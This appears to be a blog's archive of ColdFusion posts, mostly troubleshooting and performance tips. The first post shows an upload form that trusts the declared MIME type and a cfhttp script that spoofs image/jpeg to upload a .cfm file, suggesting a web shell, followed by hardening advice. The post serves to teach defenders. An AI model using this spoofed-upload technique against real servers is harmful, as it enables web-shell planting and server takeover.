Category Archives: ColdFusion

Spoofing MIME Types with ColdFusion and CFHTTP

Posted on by
1

Think your file uploads are secure? Think again. Using this very simple technique with ColdFusion installed locally, you can easily spoof the MIME type of any file and get it uploaded to another server, allowing any number of code exploits.
First, we’re going to write a quick file upload script:

<cfform name='upload' action='uploadact.cfm' enctype='multipart/form-data' method='post'>
<cfinput type='file'
name='FileUpload'
required='yes'
message='Select a file to upload.' /><br />
<cfinput
type='submit'
value='Upload File'
name='submit' />
</cfform>

Notice this goes to an action page called uploadact.cfm which only accepts jpegs and gifs, this form actually handles the upload as follows:

<cfif isDefined('fileUpload')>
<cffile
action='upload'
fileField='fileUpload'
destination='C:path to upload'
accept='image/jpeg,image/gif'
nameconflict='makeunique'>
<p>Thankyou, your file has been uploaded.</p>
<p><a href='/'>Return Home</a></p>
</cfif>

Now for the fun part, we’re going to write a page using cfhttp that would run on the attackers server/workstation that allows for files local to them to be uploaded by faking the MIME type with cfhttpparam:

<cfhttp
url='http://example.com/uploadact.cfm'
method='post'>
<cfhttpparam
type='formfield'
value='Upload File'
name='submit'>
<cfhttpparam
type='file'
name='FileUpload'
file='C:PathTo	est.cfm'
mimetype='image/jpeg'>
</cfhttp>

Now with this we could upload an ASP or ColdFusion based web shell that would essentially give us unlimited access to a server.  So follow the following tips:

  1. If you have an Enterprise license, use Sandbox Security.  This will limit each site to its own set of directories and data sources.
  2. Disable cfexecute and cfregistry.  If you can use Sandboxes, do this for each Sandbox, or setup a global Sandbox on your main site’s directory.  Remember with Sandboxes, if you absolutly need cfexecute, remember that you can setup a Sandbox for a single folder with access to it and put processing files in here (say to use FFMPEG for videos conversion).
  3. Disable JSP (Adobe Instructions) if you don’t actually use it.  Since the default for ColdFusion is to run as System on Windows, any JSP file that makes its way to the server will have full access, and JSP’s don’t follow Sandboxes, so even if they are setup they are of no use.
  4. Run ColdFusion as another user (Adobe Instructions).  Obviously, running ColdFusion as a less privileged user will prevent total control of your server should something malicious get uploaded
  5. Always perform multiple checks on your file uploads (Pete Freitag has a good article on this)

ColdFusion Variable Scopes

Posted on by
Reply

The need to understand how ColdFusion handles variable scopes is essential to keeping both your application and server running smoothly and preventing performance decreases.  Scoping your variables takes seconds at the time of development.  I frequently talk with customers who have ‘memory leaks’ and are quick to blame the application server, however a ColdFusion application server that doesn’t run code would not typically experience a leak.
The Scopes
 
Order of Evaluation
Should you specify a variable name with out a scope, ColdFusion has to search through the different scopes in order to determine if it exists.  As you might imagine, if this is on a very frequently requested page, this could cause significant slow-downs and performance issues.

  1. Function local (only UDFs and CFCs)
  2. Thread local (only inside threads)
  3. Arguments
  4. Variables
  5. Thread
  6. CGI
  7. Cffile
  8. URL
  9. Form
  10. Cookie
  11. Client

If the variable exists in any of the other scopes, it must be scoped properly to be accessed.
Additional Reading

 

Jason Dean’s Security Series

Posted on by
Reply

Jason over at 12Robots.com has been writing a really great series of articles about secure application development for quite some time.  Since I haven’t seen them all in one index, I threw up links to all the articles on this page.

I’m pretty sure I got them all from Jason’s site, but if I did just let me know in a comment.

ColdFusion Stops Serving After a Few Requests

Posted on by
Reply

Just had an issue where ColdFusion would only serve a few requests before locking up and sending constant 503 errors.  Turns out there were almost 200k files in C:Coldfusion8
untimeserverscoldfusionSERVER-INF empwwwroot-tmp.  So, to fix this I stopped ColdFusion, renamed wwwroot-tmp to wwwroot-tmp2 and make a new wwwroot-tmp.  Once ColdFusion was started it ran like a champ again.  My theory is the disk I/O was killing CF when it was looking for a chached file.

cfimage CAPTCHA Timer already cancelled

Posted on by
Reply

I’ve been running into this error more often lately.  Customers using cfimage to create a captcha image will sometimes get the following error when creating the image:

java.lang.IllegalStateException: Timer already cancelled.

It appears this is realted to Java not having enough memory to create an image, yet ColdFusion still has enough to run and serve pages, which means you have to restart ColdFusion at that point.
Anyone else run into this, or know of a way to prevent it?
 

ColdFusion Verity – Unable to create temporary file

Posted on by
Reply

While working on a ticket today, I came across an interesting error message while trying to index or refresh a Verity collection.

Unable to create temporary file
java.lang.SecurityException: Unable to create temporary file
	at java.io.File.checkAndCreate(File.java:1701)
	at java.io.File.createTempFile(File.java:1793)
	at coldfusion.tagext.search.IndexTag.doQueryUpdate(IndexTag.java:702)
	at coldfusion.tagext.search.IndexTag.doStartTag(IndexTag.java:160)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfindexverity2ecfm902179424.runPage(C:Websites41334eaeindexverity.cfm:32)
	at coldfusion.runtime.CfJspPage.invoke(CfJspPage.java:196)
	at coldfusion.tagext.lang.IncludeTag.doStartTag(IncludeTag.java:370)
	at coldfusion.runtime.CfJspPage._emptyTcfTag(CfJspPage.java:2661)
	at cfApplication2ecfc1112783929$funcONREQUEST.runFunction(C:Websites41334eaeApplication.cfc:205)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:418)
	at coldfusion.runtime.UDFMethod$ReturnTypeFilter.invoke(UDFMethod.java:360)
	at coldfusion.runtime.UDFMethod$ArgumentCollectionFilter.invoke(UDFMethod.java:324)
	at coldfusion.filter.FunctionAccessFilter.invoke(FunctionAccessFilter.java:59)
	at coldfusion.runtime.UDFMethod.runFilterChain(UDFMethod.java:277)
	at coldfusion.runtime.UDFMethod.invoke(UDFMethod.java:192)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:448)
	at coldfusion.runtime.TemplateProxy.invoke(TemplateProxy.java:308)
	at coldfusion.runtime.AppEventInvoker.invoke(AppEventInvoker.java:74)
	at coldfusion.runtime.AppEventInvoker.onRequest(AppEventInvoker.java:243)
	at coldfusion.filter.ApplicationFilter.invoke(ApplicationFilter.java:269)
	at coldfusion.filter.RequestMonitorFilter.invoke(RequestMonitorFilter.java:48)
	at coldfusion.filter.MonitoringFilter.invoke(MonitoringFilter.java:40)
	at coldfusion.filter.PathFilter.invoke(PathFilter.java:86)
	at coldfusion.filter.ExceptionFilter.invoke(ExceptionFilter.java:70)
	at coldfusion.filter.ClientScopePersistenceFilter.invoke(ClientScopePersistenceFilter.java:28)
	at coldfusion.filter.BrowserFilter.invoke(BrowserFilter.java:38)
	at coldfusion.filter.NoCacheFilter.invoke(NoCacheFilter.java:46)
	at coldfusion.filter.GlobalsFilter.invoke(GlobalsFilter.java:38)
	at coldfusion.filter.DatasourceFilter.invoke(DatasourceFilter.java:22)
	at coldfusion.CfmServlet.service(CfmServlet.java:175)
	at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:86)
	at coldfusion.monitor.event.MonitoringServletFilter.doFilter(MonitoringServletFilter.java:42)
	at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at com.seefusion.Filter.doFilter(Filter.java:49)
	at com.seefusion.SeeFusion.doFilter(SeeFusion.java:1471)
	at jrun.servlet.FilterChain.doFilter(FilterChain.java:94)
	at jrun.servlet.FilterChain.service(FilterChain.java:101)
	at jrun.servlet.ServletInvoker.invoke(ServletInvoker.java:106)
	at jrun.servlet.JRunInvokerChain.invokeNext(JRunInvokerChain.java:42)
	at jrun.servlet.JRunRequestDispatcher.invoke(JRunRequestDispatcher.java:286)
	at jrun.servlet.ServletEngineService.dispatch(ServletEngineService.java:543)
	at jrun.servlet.jrpp.JRunProxyService.invokeRunnable(JRunProxyService.java:203)
	at jrunx.scheduler.ThreadPool$DownstreamMetrics.invokeRunnable(ThreadPool.java:320)
	at jrunx.scheduler.ThreadPool$ThreadThrottle.invokeRunnable(ThreadPool.java:428)
	at jrunx.scheduler.ThreadPool$UpstreamMetrics.invokeRunnable(ThreadPool.java:266)
	at jrunx.scheduler.WorkerThread.run(WorkerThread.java:66)

Truns out that if you are using Sandbox Security you’ll need to add the value of the GetTempDirectory function to your Sandbox with read and write permissions and it will start working again.

cfimage CAPTCHA Not Displaying

Posted on by
3

You may occassionally run into a problem with ColdFusion and IIS where your CAPTCHA images created by cfimage are simply blank and look like they don’t exists.  Assuming you don’t have a corrupt installation, the following instructions will help fix this.

  1. Open IIS
  2. Expand the server your working with by clicking the plus sign and goto the properties for “Web Sites”
  3. In the Home Directory tab click on “Configuration”
  4. You should now be on the “Application Configuration” screen, select the Wildcard Mapping at the bottom which goes to cfroot/runtime/lib/wsconfig/1/jrun_iis6_wildcard.dll and hit Edit
  5. Make sure “Verify that file exists” is unchecked and hit OK until your back to the IIS Manager.

This should correct any issues you had with cfimage and many other tags that also create things “on the fly” in ColdFusion.

ColdFusion Redirects

Posted on by
4

If you don’t have access to mod_rewrite or an isapi rewrite plugin, you may be forced to use some of the built in ColdFusion functions to force a redirect.  Today I had a customer who wanted to force all traffic through the www. portion of their domain.  Examples of doing this are below:
Application.cfc
You’ll want to do this on your onRequestStart function so it gets checked on every page

<cfif CGI.SERVER_NAME eq "domain.com">
<cfoutput>
<cflocation url="http://www.#cgi.HTTP_HOST##cgi.PATH_INFO#"
statuscode="301"
addtoken="no">
</cfoutput>
</cfif>

The benefit of this method is that it should work equally well with subdomains and URL parameters attached.
Application.cfm
You can use the same thing as above in an Application.cfm file, just put it by the top so its processed first.

ColdFusion Duplicate Application Names

Posted on by
Reply

I had to help a customer today that was having an issue where variables he set in his application.cfm in a sub-folder were not being set.  This was causing all kinds of issues, like the wrong DSN being used which caused issues on database updates.  Turns out he had a similar application.cfm in his admin folder, so I checked that out.  What I found was that the admin one had a name of “SiteNameAdmin” but the secure folder (which was having issues) was simply “SiteName” the exact same as the root of his site.  So, I changed the name and voila it worked perfectly.
More Reading
Ray Camden has a great blog post about this same issue:
http://www.coldfusionjedi.com/index.cfm/2007/4/12/Duplicate-Application-name-issue

ColdFusion Template Cache

Posted on by
2

This may seem obvious, but I always struggle to find the location where the class files are created by ColdFusion’s template cache.

[cf_root]wwwrootWEB-INFcfclasses

One thing I noticed is when you click the “Clear Template Cache” button in the ColdFusion Administrator it does not remove these files, you should be able to delete them manually and have no problems.  Remember that in production environements where you won’t have many code updates, turn Trusted Cache on.  The benefit being that ColdFusion will no longer check if the template being requested has changed.  If you do make code changes, then you’d need to either manually clear the cache or restart ColdFusion to get the change picked up.
Additional Reading:
Tangling with the Template Cache